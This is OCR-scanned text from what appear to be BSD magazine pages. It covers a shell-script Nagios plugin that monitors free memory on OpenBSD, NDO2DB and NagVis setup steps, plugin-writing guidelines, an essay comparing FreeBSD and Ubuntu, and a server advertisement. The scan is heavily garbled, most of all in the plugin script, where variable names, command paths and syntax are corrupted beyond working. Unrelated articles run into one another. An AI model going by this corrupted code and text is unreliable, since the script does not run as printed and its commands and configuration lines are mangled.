

-w INTEGER 
EXit with WARNING status if less than INTEGER MB of 
memory are free 
-w PERCENTS 
EXit with WARNING status if less than PERCENT of 
memory is free 
=C INVEGER 
EXI1t with CRITICAL Status if less than INTEGER MB of 
memory are free 
=¢  PERCENE. 
HxXit with CRITICAL Status 2£ less than PERCENT of 


memory is free 


Verbose output 
KOT 


} 


# Main ####tTTERE PEPE ETOE EH EP PPE ETE HE ERP PEE ETE EE 


# Total memory size (in MB) 

tot_mem=$(( '/sbin/sysctl -n hw.physmem' / BYTES IN_ 
Me) 

# Free memory size (in MB) 

ieee mem—S(( 1 /Usr/Din/vmstar | /usr/bin/tail —1 | 
puse/ Din awe "4 print: So° }7 1) 

/ KB_IN MB )) 
# Free memory size (in percentage) 


free mem perc=5(( free mem * 100 / tot mem )) 


# Verbosity level 
verbosity=0 

# Warning threshold 
Bites Wearn— 

# Critical threshold 


ellecisiol (e161 = 


# Parse command line options 
while [5 Si bevdo 
case “SIM 1n 
=r ili, ——he Ip) 
Pinte ele 
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Listing 23b. A plugin to monitor the amount of free memory on the local machine 


exit Soleih, OK 
=V | ==version) 
Primuecevtslom 
exit $SSTATE OK 
-v | --verbose) 
> (( vVerbosity+, ))) 
Shite 
Alley | Hecineigiakigiey || eo | aeeas ihwaletoully 
PEC Ze 20 NS ee oo Spleen 
# Threshold not provided 
echo "SPROGNAME: Option 'S1' requires 
an argument" 
Prine Weage 
exit SSTATE UNKNOWN 
elie so" — 0-910) sehen 
# Threshold is a number (MB) 
thresh=$2 
elgfy eo? e—— 0-9 ee le ee 
# Threshold is a percentage 
thresh=$(( tot mem * ${2%\%} / 100 )) 
else 
# Threshold is neither a number nor 
a Pereetcage 
echo "SPROGNAME: Threshold must be 
integer or percentage" 
Print Usage 
exit SSTATE UNKNOWN 
fi 
Lp ol = aw |) eo thresh warn—ocunresh ||| 
Pees err oulbeall 
shir 2 


ee 
ry 


Print Wsage 
exit $STATE OK 


ee 
ot 


echo "SPROGNAME: Invalid option '$1'" 
Print usage 
exit SSTATE UNKNOWN 

esac 


done 


eee zee ees Se yee ise ee eS ee ile) Selle ame om 
# One or both thresholds were not specified 
echo "SPROGNAME: Threshold not set" 
PLiInvelsage 
exit SSTATE UNKNOWN 
elat [| "Sthvesh Crit’ —ot) "Sthresh werm’ )); then 
# The warning threshold must be greater than the 
Critical ~thresnoid 
echo "SPROGNAME: Warning free space should be more 
than critical free space" 
Prlint, Wsage 
exit SSTATE UNKNOWN 
ci 


if [[ "Sverbosity" -ge 2 ]]; then 
# Print debugging information 
(oun Caen a HOW 
Debugging information: 
Warning tireshold. ociresi warn, ME 
Grivical  eieeshotd]. ciresi este MB 
Verbosity level: Sverbosity 
i¢talsMemony: 7 foe mem) MB 
Piece Memory: otree mem MB W(j free mem percs) 
KOT 


du 


if [[ "S$free mem" -lt "Sthresh crit" ]]; then 
# Free memory is less than the critical threshold 
echo) MEMORY CR IT1Cll = Erec Mem Perea ebice. | hice. 
Hem MB OnE OL lou mem MB)™ 
exit $SSTATE CRITICAL 
elif [[ "Sfree mem" -lt "Sthresh warn" ]]; then 
# Free memory is less than the warning threshold 
echow MEMORY Wan NiINGy— Gree men Pere -purcen( ree. 
Mete VE COME Ore LOE mem: ME) 
exit SSTATE WARNING 
else 
# There's enough free memory! 
echlow MEMOR OKs bree Memppete . atce (asec mem 
MB Gur Of Stee mem Me)” 
exit SSTATH OK 
fi 
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Network monitoring with Nagios and OpenBSD 


# patch -p0 < ndo-openbsd.patch 


Now we can start MySQL, assign a password to the root 
account and create the appropriate database and user. 
The database creation script can be found in the ap/ 
directory of the extracted tarball (see Listing 18). 

Now we need to manually copy the binaries and 
configuration files: 


# cp src/ndomod-3x.o /usr/local/libexec/nagios/ndomod.o 

# cp config/ndomod.cfg-sample /var/www/etc/nagios/ 
ndomod.cfg 

# cp src/ndo2db-3x /usr/local/sbin/ndo2db 

# cp config/ndo2db.cfg-sample /var/www/etc/nagios/ 
ndo2db.cfg 


and edit the NDOMOD configuration file: see Listing 19. 
And the NDO2DB configuration file: see Listing 20. 

Then we have to specify the event broker module that 
Nagios must load at startup, by adding the following line 
to the main configuration file: 


/var/www/etc/nagios/nagios.cfg 
broker module=/usr/local/libexec/nagios/ndomod.o config_ 


file=/var/www/etc/nagios/ndomod.cfg 


and, finally, we can start the NDO2DB daemon and 
restart Nagios: 


# /usr/local/sbin/ndo2db -c /var/www/etc/nagios/ndo2db.cfg 
# chmod 770 /var/www/var/nagios/rw/ndo.sock 
# pkill nagios 


# nagios -d /var/www/etc/nagios/nagios.cfg 


Add the following lines to /etc/rc.local to start the 
NDO2DB daemon on boot: 


/etc/rc.local 
if [| -x /usr/local/sbin/ndo2db ]; 
echo -n ' ndo2db' 


then 


/usr/local/sbin/ndo2db -c /var/www/etc/nagios/ndo2db.cfg 
chmod 770 /var/www/var/nagios/rw/ndo.sock 


a 


Configuring NagVis 

Now that we have installed all the necessary prerequisites, 
we can download (http:/www.nagvis.org/downloads) and 
extract the NagVis tarball: 


# tar -zxvf nagvis-x.x.x.tar.gz -C /var/www/nagios/ 


P wea. | 


www.bsdmag.org 


# mv /var/www/nagios/nagvis-x.x.x /var/www/nagios/nagvis 


# chown -R www /var/www/nagios/nagvis/{etc,var} 


Below is a sample NagVis configuration file; please 
refer to the documentation (http://docs.nagvis.org/1.3/ 
en_US/index.html) for a detailed description of each 
parameter: 


Maps definition 

Now we have to create the images for NagVis to use as the 
background for each map and put them in the /var/www/nagios/ 
nagvis/images/maps/ directory. You can find a few examples here 
(http://www.nagvis.org/screenshots).Once the map images 
are ready, we can tell NagVis where to place objects on the 
map by creating and editing the maps configuration files. Each 
map must have a corresponding configuration file (iN /var/www 
/nagios/nagvis/etc/maps/) With the same name, plus the .cfg 
extension. 

Below is a sample map configuration file; syntax is 
rather simple, so you can easily tweak it to include your 
own hosts and services (please refer to the documentation 
(http://docs.nagvis.org/1.3/en_US/index.html) for further 
details; see Listing 22). 

To allow the web interface to modify NagVis' 
configuration, make sure that all configuration files belong 
to, and are writable by, the www user. 


# chown www /var/www/nagios/nagvis/etc/maps/*.cfg 


# chmod 644 /var/www/nagios/nagvis/etc/maps/*.cfg 


Writing your own Nagios plugins 

Plugins are executable files run by Nagios to determine 
the status of a host or service. By default, Nagios comes 
with a very rich set of official plugins that should cover 
most people's needs; in addition, you can find lots of 
contributed plugins on the Monitoring Exchange website 
(http://www.monitoringexchange.org/), some of which 
are also available via OpenBSD's packages and ports 
system. 

However, despite the abundance of plugins, there may 
be occasions in which no existing plugin is suitable for 
monitoring a particular service, thus forcing you to write 
a fully custom plugin, tailored to your exact needs. Luckily, 
this is a very simple task! 

Nagios doesn't bind you to a specific programming 
language: plugins may be either compiled C programs 
or interpreted scripts, in Perl, shell, Python or any other 
language. Nagios doesn't mess with the internals of 
plugins; however, it asks developers to follow a few basic 
guidelines (http://nagiosplug.sourceforge.net/developer- 
guidelines.html), just for standard's sake. 
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Table 1. Valid plugin return codes 


Service/Host status | Service Status description Host status description 


Ok/Up The plugin was able to check the service and The host is up and replied in acceptable time 
it seemed to work correctly 


Critical/Down The service was not running or it exceeded = Thehost is down or some "critical" threshold 
some "critical" threshold was exceeded 
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Command line options 
A plugin's command line must follow some _ specific 
requirements: 


¢ positional arguments are strongly discouraged; 

¢ all plugins should provide a -v command-line option 
(and --version If long options are enabled) to display 
the plugin's revision number; 

¢ the -: option, as well as any incorrect option, displays 
a short usage statement that should fit on a standard 
80x25 terminal; 


e the -n, Or --neip, option displays detailed help 
information; 
e the -v, Or --verbose, Option adjusts the verbosity level; 


multiple -v options (up to 3) should increase the 
verbosity level, as described in the official guidelines 
(http://nagiosplug.sourceforge.net/developer- 
guidelines.html#HAEN40); 

¢ There are a few other reserved options that should 
not be used for other purposes: 
* -t OF --timeout (plugin timeout); 

¢ -w Of --warning (warning threshold); 

*  -c OF --critical (Critical threshold); 

¢ -H OF --hostname (name of the host to check). 


Plugin return codes 

Nagios determines the status of a host or service based 
on the return code of the plugin. Valid return codes are: 
see Table 1. 
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The warning and critical thresholds are usually set via 
command line options (see above http:/www.kernel- 
panic. it/openbsd/nagios/nagios6.htmli#nagios-6. 1). 


A sample plugin script 
Just a couple of notes before moving to a practical 
example: 


¢ plugins can access macros (http:// 
nagios.sourceforge.net/docs/2_O0/macros.html) as 
environment variables; such variables have the same 
name as the corresponding macros, with naczos _ 
prepended. For instance, the sxostnames macro will 
be accessible through the "NAGIOS_ HOSTNAME" 
environment variable; 

¢ always specify the full path of any system commands 
run from your plugins. 


Well, so let's see, as an example, what a plugin to 
monitor the amount of free memory on the local machine 
could look like: see Listing 23. 
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The Difference Between 


FreeBSD and Ubuntu in a Not So Technical Way 


As a system administrator, | have been using various distributions 
of Linux and FreeBSD. | am comfortable in a mixed environment of 
*nix operating systems to provide network services. 


possible so as not to start a flame war. | enjoy working 
with both systems and | like the way they are. 

FreeBSD is a complete operating system. Userland 
utilities, drivers for the devices, and the kernel itself are 
available and held in a centralized location/repository. 
Linux on the other hand is actually just the kernel. 
Companies and Organizations release their distribution/ 
flavor by using and customizing the Linux kernel, bundleit 
with software/packages mostly free and open-source 
software, and optionally add some proprietary materials, 
drivers or codecs. This is the case for Ubuntu, the Linux 
distribution released by Canonical, Inc. 

The default shell for regular users in FreeBSD is sh 
Bourne Shell and tesh Improved C Shell for the root user. 
In Ubuntu it is bash all the way. In terms of application 
configuration files, rest assured that FreeBSD keeps them 
in the /usr/local/etc. Ubuntu on the other hand, has this 
directory empty. Ubuntu uses the /etc and its subfolders 
for application configuration files. FreeBSD also uses the / 
etc/rc.conf file, which according to the man page, contains 
descriptive information about the local host name, 
configuration details for any potential network interfaces, 
and services that should be started at system boot up. 

FreeBSD is licensed under the BSD license. This is 
unrestrictive and gives freedom in a way that if an individual 
or an organization used, improved, or modified your code, 
and made a proprietary software from it, the individual or 
organization may or may not credit you. In my personal 
view, this is true freedom. Ubuntu on the other hand is 
licensed mostly under the GPL, which is very restrictive. It 
preserves and protects the openness of the software. 

As for the base installation, in my experience, FreeBSD 
installs faster against the base installation of Ubuntu 
Server. The formatting of partitions in FreeBSD is faster 
than Ubuntu (my personal experience again). In terms 
of software installation, you can choose a variety of 
methods using FreeBSD. My favorite of them all is the 
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ports collection, which you need to be patient and more 
patient when you install. You can also use packages (not 
as complete as the ports collection) and compile sources. 
In Ubuntu, you use the APT system, dpkg packages, and 
you can also compile sources. 

The documentation for FreeBSD is so complete, that you 
will be able to learn a lot of stuff from the OS itself, shells, TCP/ 
IP, and network services. | think Ubuntu’s documentation is 
good too, but not as close as the FreeBSD handbook. Using 
and learning FreeBSD with the help of the handbook and the 
very supportive members of the FreeBSD Forum at htto:/ 
forums.freebsd.org give a new user the experience of learning 
the ins and outs of an operating system in a deeper way. 

lf you want to learn an operating system from the 
internals up to the applications, | would strongly 
recommend FreeBSD for you. You may not be able to do 
things as you expect them to be easy. You will need a lot 
of patience and a couple of hours for software compilation 
(should you choose the ports collection). The learning 
you will gain is worthwhile and you will have a deeper 
understanding of a complete operating system. 

In short, the difference between FreeBSD and Ubuntu 
is in the internals, kernel, startup scripts, ways of software 
installation including management and most system 
utilities and tools. The software and applications they use 
are both free and open source software (FOSS), which 
means gnome is gnome, kde is kde, firefox is firefox, for 
both FreeBSD and Ubuntu. 

As promised, | did not write things that may or will start a 
flame war. | did my best to be honest, fair, and unbiased in 
discussing the difference between FreeBSD and Ubuntu ina 
not so technical way, but in a point of view of a casual user. 


JOSHUA EBARVIA 

Joshua Ebarvia is a java programmer, systems administrator 
and college lecturer. His passion is working and using operating 
systems specially UNIX-based and UNIX-cloned systems. You can 
reach him at joshua.ebarvia@gmail.com 
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Served Exactly How You Like! 


Tired of being able to choose from only chocolate, strawberry, 
or vanilla? At iXsystems, we understand your need for custom- 
made servers. 


“Open Source Hardware Design” is the iXsystems trademark. iXsystems provides an 
assortment of pre-configured servers and storage solutions, but our true pride rests on 
our ability to customize our products to meet your specific tastes and needs. iXsystems 
mixes in the raw power of Intel® Xeon® 5600/5500 Series Processors for a truly delicious 
treat. Our Professional Enterprise Service Level packages and desktop support offering 
also enables us to ensure you get the most from your FreeBSD® and PC-BSD™ systems, 
adding the perfect toppings to your order. 


Call iXsystems toll free or visit our website today! 
+1-800-820-BSDi | www.iXsystems.com 


Powertul. 
Intelligent. 


Intel, the Intel logo, and “eon Inside are trademarks of registered trademarks of Intel Corporation in the U.S.and other countries. 
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